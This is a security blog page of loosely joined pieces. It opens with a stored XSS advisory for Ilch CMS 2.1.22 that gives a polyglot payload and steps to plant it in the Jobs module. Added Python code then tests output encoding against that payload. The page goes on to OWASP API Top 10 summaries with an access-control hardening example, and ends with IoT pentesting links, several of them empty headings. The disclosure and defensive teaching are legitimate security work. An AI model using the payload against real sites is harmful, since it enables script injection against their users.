Vulnerability Name: Stored Cross-site scripting – XSS Polyglot (Stored)

Vulnerability Explanation:  An XSS polyglot can be generally defined as any XSS vector that is executable within various injection contexts in its raw form.

Browsers Verified In:

Firefox 68.0.2 (64-bit)

Anatomy of the polyglot

  • jaVasCript:: A label in ECMAScript; a URI scheme otherwise.
  • /*-/*`/*\`/*'/*"/**/: A multi-line comment in ECMAScript; a literal-breaker sequence.
  • (/* */oNcliCk=alert() ): A tangled execution zone wrapped in invoking parenthesis!
  • //%0D%0A%0d%0a//: A single-line comment in ECMAScript; a double-CRLF in HTTP response headers.
  • </stYle/</titLe/</teXtarEa/</scRipt/–!>: A sneaky HTML-tag-breaker sequence.
  • \x3csVg/<sVg/oNloAd=alert()//>\x3e: An innocuous svg element.


Stored XSS allows an attacker to embed a malicious script into a vulnerable page, which is then executed whenever a victim views the page. Reflected cross-site scripting, by contrast, relies on a victim being socially engineered into clicking a malicious link, sent via email for example.

Proof of Concept:  (Stored Cross site scripting – XSS Polyglot (Stored))

Affected items: ilchCMS  2.1.22

Step 1: Host the application using local web server xampp, install the Ilch CMS as per documentation.

Step 2: Go to admin panel

Step 3: Click Modules Tab

Step 4: Under the modules click Jobs Tab

Step 5: Enter the payload in every input field (title, text, email id).

Step 6: Finally click Add. The payload executes as soon as the page renders, and because it is stored it executes again on every refresh.

Xss Payload used (Html Comment):

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(1234) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(1234)//>\x3e


Url: http://localhost/cms/Ilch-v2.1.22/index.php/admin/jobs/index/treat
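The anatomy above explains why one string fires in several contexts; the point for a fix is that a blacklist (stripping <script> tags, say) does not help against it, while context-appropriate output encoding does. The following is an added example written for this page, not code from the advisory or from Ilch CMS. The three templates are constructed stand-ins for places a CMS might echo a stored field such as the Jobs module's title or text (body text, an attribute value, a textarea); the breakout marker is the polyglot's own svg onload element, which is what ends up parsed as markup in every one of these contexts.

```python
"""Render the PoC polyglot into three HTML contexts raw, after a naive tag filter,
and after entity encoding, and check whether it escapes its context.
Added example; the templates are constructed."""
import html
import re
from typing import Dict

# The payload from the PoC, as a Python string literal.
POLYGLOT = (
    "jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert(1234) )//%0D%0A%0d%0a//"
    "</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert(1234)//>\\x3e"
)

# Constructed render contexts; {v} is where the stored field is echoed.
CONTEXTS: Dict[str, str] = {
    "html_body": "<p>{v}</p>",
    "attribute": '<input type="text" value="{v}">',
    "textarea": "<textarea>{v}</textarea>",
}

# If the svg element survives into the rendered page as a real tag, the payload
# has escaped the intended context (the attribute quote and the textarea are
# both closed by earlier pieces of the polyglot).
BREAKOUT_RE = re.compile(r"<svg/onload=", re.IGNORECASE)


def render_unsafe(template: str, value: str) -> str:
    """Echo the value exactly as stored (the vulnerable behaviour)."""
    return template.format(v=value)


def render_escaped(template: str, value: str) -> str:
    """Fix for HTML body and attribute positions: entity-encode &, <, >, " and '
    so the browser can only treat the value as text."""
    return template.format(v=html.escape(value, quote=True))


def naive_filter(value: str) -> str:
    """A blacklist of the kind often tried instead of encoding: strip <script> tags."""
    return re.sub(r"</?script[^>]*>", "", value, flags=re.IGNORECASE)


def breaks_out(rendered: str) -> bool:
    return BREAKOUT_RE.search(rendered) is not None


def evaluate(value: str = POLYGLOT) -> Dict[str, Dict[str, bool]]:
    """For each context: does the payload break out when echoed raw, after the
    blacklist filter, and after entity encoding? True means it fires."""
    return {
        name: {
            "raw": breaks_out(render_unsafe(template, value)),
            "script_filtered": breaks_out(render_unsafe(template, naive_filter(value))),
            "escaped": breaks_out(render_escaped(template, value)),
        }
        for name, template in CONTEXTS.items()
    }


if __name__ == "__main__":
    for context, result in evaluate().items():
        print(context, result)
```

html.escape is the right primitive only for HTML body and quoted-attribute positions; a value echoed inside a <script> block or a JavaScript string needs JavaScript-string encoding (json.dumps in Python) instead, and a value placed in a URL attribute needs scheme validation on top, which is exactly the "jaVasCript:" prefix in the polyglot's first segment.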


Website: https://www.ilch.de/

Download Version: https://www.ilch.de/downloads-show-1826.html

Video POC:

Twitter – https://twitter.com/the_pr0fess0r_

OWASP API Security Top 10 2019

A1 – Broken Object Level Authorization
APIs tend to expose endpoints that handle object identifiers, creating a wide attack surface for object-level access control issues. Object-level authorization checks should be considered in every function that accesses a data source using input from the user.

A2 – Broken Authentication
Authentication mechanisms are often implemented incorrectly, allowing attackers to compromise authentication tokens or to exploit implementation flaws to assume other users' identities temporarily or permanently. Compromising the system's ability to identify the client/user compromises API security overall.

A3 – Excessive Data Exposure
Aiming for generic implementations, developers tend to expose all object properties without considering their individual sensitivity, relying on clients to perform the data filtering before displaying it to the user. Without controlling the client's state, servers receive more and more filters, which can be abused to gain access to sensitive data.

A4 – Lack of Resources & Rate Limiting
Quite often, APIs do not impose any restrictions on the size or number of resources that can be requested by the client/user. Not only can this impact the API server's performance, leading to Denial of Service (DoS), it also leaves the door open to attacks on authentication such as brute force.

A5 – Broken Function Level Authorization
Complex access control policies with different hierarchies, groups, and roles, and an unclear separation between administrative and regular functions, tend to lead to authorization flaws. By exploiting these issues, attackers gain access to other users' resources and/or administrative functions.

A6 – Mass Assignment
Binding client-provided data (e.g., JSON) to data models without filtering properties against a whitelist usually leads to Mass Assignment. Guessing object properties, exploring other API endpoints, reading the documentation, or providing additional object properties in request payloads allows attackers to modify object properties they are not supposed to.

A7 – Security Misconfiguration
Security misconfiguration is commonly a result of insecure default configurations, incomplete or ad-hoc configurations, open cloud storage, misconfigured HTTP headers, unnecessary HTTP methods, permissive Cross-Origin Resource Sharing (CORS), and verbose error messages containing sensitive information.

A8 – Injection
Injection flaws, such as SQL, NoSQL, and Command Injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's malicious data can trick the interpreter into executing unintended commands or accessing data without proper authorization.

A9 – Improper Assets Management
APIs tend to expose more endpoints than traditional web applications, making proper and up-to-date documentation highly important. A proper inventory of hosts and deployed API versions also plays an important role in mitigating issues such as deprecated API versions and exposed debug endpoints.

A10 – Insufficient Logging & Monitoring
Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, and pivot to more systems to tamper with, extract, or destroy data. Most breach studies show that the time to detect a breach is over 200 days, and that breaches are typically detected by external parties rather than by internal processes or monitoring.
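A1 and A6 usually appear together in the same handler, so they are easiest to see side by side. The following is an added example written for this page, not taken from the OWASP document or from any real API: a constructed in-memory user table and a PUT /users/{id}-style profile update, first as it is often written (path id trusted, whole JSON body bound to the model) and then with object-level authorization and allow-list binding. Field names, the Forbidden/BadRequest classes and the attempt() helper are all illustrative.

```python
"""A1 (broken object level authorization) and A6 (mass assignment) in one
profile-update handler: the naive version with both flaws, then the hardened one.
Added example; the user store, field names and handlers are constructed."""
from dataclasses import asdict, dataclass
from typing import Any, Dict, Tuple


@dataclass
class User:
    id: int
    email: str
    display_name: str
    is_admin: bool = False


class Forbidden(Exception):
    pass


class BadRequest(Exception):
    pass


def seed() -> Dict[int, User]:
    """Constructed in-memory user table; Alice is the only admin."""
    return {
        1: User(1, "alice@example.test", "Alice", is_admin=True),
        2: User(2, "bob@example.test", "Bob"),
        3: User(3, "carol@example.test", "Carol"),
    }


def update_profile_naive(store: Dict[int, User], caller_id: int, target_id: int,
                         payload: Dict[str, Any]) -> Dict[str, Any]:
    """As often written: the target id from the URL path is trusted without checking
    it belongs to the caller (A1), and every key in the body is bound to the model (A6)."""
    user = store[target_id]
    for key, value in payload.items():
        setattr(user, key, value)
    return asdict(user)


# Explicit allow-list of fields a client may set on its own profile.
WRITABLE_FIELDS = frozenset({"email", "display_name"})


def update_profile(store: Dict[int, User], caller_id: int, target_id: int,
                   payload: Dict[str, Any]) -> Dict[str, Any]:
    """Hardened: object-level authorization first, then allow-list binding."""
    caller = store.get(caller_id)
    target = store.get(target_id)
    # Owner or admin only. "Missing" and "not yours" get the same answer so the
    # endpoint cannot be used to enumerate which ids exist.
    if caller is None or target is None or (caller.id != target.id and not caller.is_admin):
        raise Forbidden("not found")
    unknown = set(payload) - WRITABLE_FIELDS
    if unknown:
        # Reject rather than silently drop: a client sending is_admin is worth logging.
        raise BadRequest(f"fields not writable: {sorted(unknown)}")
    for key in WRITABLE_FIELDS.intersection(payload):
        setattr(target, key, payload[key])
    return asdict(target)


def attempt(handler, *args) -> Tuple[str, Any]:
    """Run a handler and report ('ok', result) or ('error', exception class name)."""
    try:
        return "ok", handler(*args)
    except (Forbidden, BadRequest) as exc:
        return "error", type(exc).__name__


if __name__ == "__main__":
    # Bob (id 2) tries to rename Carol (id 3) and make her an admin.
    attack = {"display_name": "pwned", "is_admin": True}
    print("naive:                 ", attempt(update_profile_naive, seed(), 2, 3, attack))
    print("hardened, other user:  ", attempt(update_profile, seed(), 2, 3, attack))
    print("hardened, own, bad key:", attempt(update_profile, seed(), 2, 2, attack))
    print("hardened, own, ok:     ", attempt(update_profile, seed(), 2, 2, {"display_name": "Robert"}))
```

The authorization check compares the authenticated caller against the object, not against a role string; the allow-list is a set of field names the handler owns, not a deny-list of "dangerous" ones, so a new sensitive column added to the model later is unwritable by default.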

IoT Pentesting – Approach & Methods

IoT Methodology

  1. Network
  2. Web (Front & Backend and Web services)
  3. Mobile App(Android & iOS)
  4. Wireless Connectivity
  5. Firmware Pentesting(Hardware or IoT device OS)
  6. Hardware Level Approach
  7. Storage Areas

Important Websites you should know 

  1. https://blog.exploitee.rs/2018/10/
  2. https://www.exploitee.rs/
  3. https://forum.exploitee.rs/
  4. Your Lenovo Watch X Is Watching You & Sharing What It Learns
  5. Your Smart Scale is Leaking More than Your Weight: Privacy Issues in IoT
  6. Smart Bulb Offers Light, Color, Music, and… Data Exfiltration?
  7. Besder-IPCamera analysis
  8. Smart Lock

IoT Security Group

  1. http://iotpentest.com/
  2. https://blog.attify.com
  3. https://payatu.com/blog/
  4. http://jcjc-dev.com/
  5. https://w00tsec.blogspot.in/
  6. http://www.devttys0.com/
  7. https://www.rtl-sdr.com/
  8. https://keenlab.tencent.com/en/
  9. https://courk.cc/
  10. https://iotsecuritywiki.com/
  11. https://cybergibbons.com/
  12. http://firmware.re/
  13. https://iotmyway.wordpress.com/
  14. http://blog.k3170makan.com/
  15. https://blog.tclaverie.eu/
  16. http://blog.besimaltinok.com/category/iot-pentest/
  17. https://ctrlu.net/
  18. https://duo.com/decipher/
  19. http://www.sp3ctr3.me
  20. http://blog.0x42424242.in/
  21. https://dantheiotman.com/
  22. https://blog.danman.eu/

Nmap CheatSheet

Search Engines for IoT Devices

  1. Shodan
  2. FOFA
  3. Censys
  4. Zoomeye

CTF For IoT’s And Embedded

  1. https://github.com/hackgnar/ble_ctf
  2. https://www.microcorruption.com/
  3. https://github.com/Riscure/Rhme-2016
  4. https://github.com/Riscure/Rhme-2017
  5. https://blog.exploitlab.net/2018/01/dvar-damn-vulnerable-arm-router.html
  6. https://github.com/scriptingxss/IoTGoat

YouTube Channels for IoT Pentesting

  1. Liveoverflow
  2. Binary Adventure
  3. EEVBlog
  4. JackkTutorials
  5. Craig Smith
  6. iotpentest [Mr-IoT]
  7. Besim ALTINOK – IoT – Hardware – Wireless
  8. Ghidra Ninja

IoT security vulnerabilities checking guides

Exploitation Tools & OS

Reverse Engineering Tools

IoT Protocols Pentesting

Radio IoT Protocols Overview

Base transceiver station (BTS)

GSM & SS7 Pentesting

Zigbee & Zwave

BLE Intro and Tools

BLE Pentesting Tutorials

Mobile security (Android & iOS)

Firmware Pentest

Firmware to pentest

IoT hardware Overview

Hardware Gadgets to pentest

Attacking Hardware Interfaces

SideChannel Attacks